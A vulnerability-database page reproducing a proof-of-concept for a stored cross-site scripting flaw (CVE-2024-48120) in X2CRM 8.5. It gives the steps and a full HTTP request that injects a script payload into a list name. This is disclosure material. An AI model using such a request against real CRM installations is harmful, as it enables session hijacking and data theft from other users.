Vulners
Lucene search
X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2024-48120 | 14 Oct 202416:40 | – | circl |
 | X2CRM 安全漏洞 | 14 Oct 202400:00 | – | cnnvd |
 | X2CRM Cross-Site Scripting Vulnerability | 17 Oct 202400:00 | – | cnvd |
 | CVE-2024-48120 | 14 Oct 202400:00 | – | cve |
 | CVE-2024-48120 | 14 Oct 202400:00 | – | cvelist |
 | CVE-2024-48120 | 14 Oct 202414:15 | – | nvd |
 | CVE-2024-48120 | 14 Oct 202414:15 | – | osv |
 | X2CRM 8.5 Cross Site Scripting | 31 Mar 202500:00 | – | packetstorm |
 | CVE-2024-48120 | 23 May 202510:44 | – | redhatcve |
 | CVE-2024-48120 | 14 Oct 202400:00 | – | vulnrichment |
10
# Exploit Title: X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
# Date: 12 September 2024
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://x2engine.com/
# Software Link: https://github.com/X2Engine/X2CRM
# Version: X2CRM v8.5
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-48120
1-) Log in to the system with any user account. Navigate to the “Opportunities” section from the top menu and select “Create List.” In the “Name” field of the new screen, enter the malicious XSS payload and click “Create.”
2-) Next, return to the “Opportunities” tab and click on “Lists” again. The stored XSS payload will be triggered.
XSS Trigger Request:
POST /x2crm/x2engine/index.php/opportunities/createList HTTP/1.1
Host: 192.168.1.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 390
Origin: http://192.168.1.108
Connection: keep-alive
Referer: http://192.168.1.108/x2crm/x2engine/index.php/opportunities/createList
Cookie: PHPSESSID=uijrtnp42qqo29vfkb4v0sps3i; YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D; 5d8630d289284e8c14d15b14f4b4dc28=9d5b82f1240eb47cd73a20df560d9b3086847e33a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%223%22%3Bi%3A1%3Bs%3A4%3A%22test%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; LoginForm[username]=test; LoginForm[rememberMe]=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&X2List%5Btype%5D=dynamic&X2List%5BassignedTo%5D=test2&X2List%5Bvisibility%5D=1&X2List%5BlogicType%5D=AND&X2List%5Battribute%5D%5B%5D=alternativeEmail&X2List%5Bcomparison%5D%5B%5D=%3D&X2List%5Bvalue%5D%5B%5D=test&yt0=CreateData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2025 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 3.15.4 - 6.5
EPSS0.02555
SSVC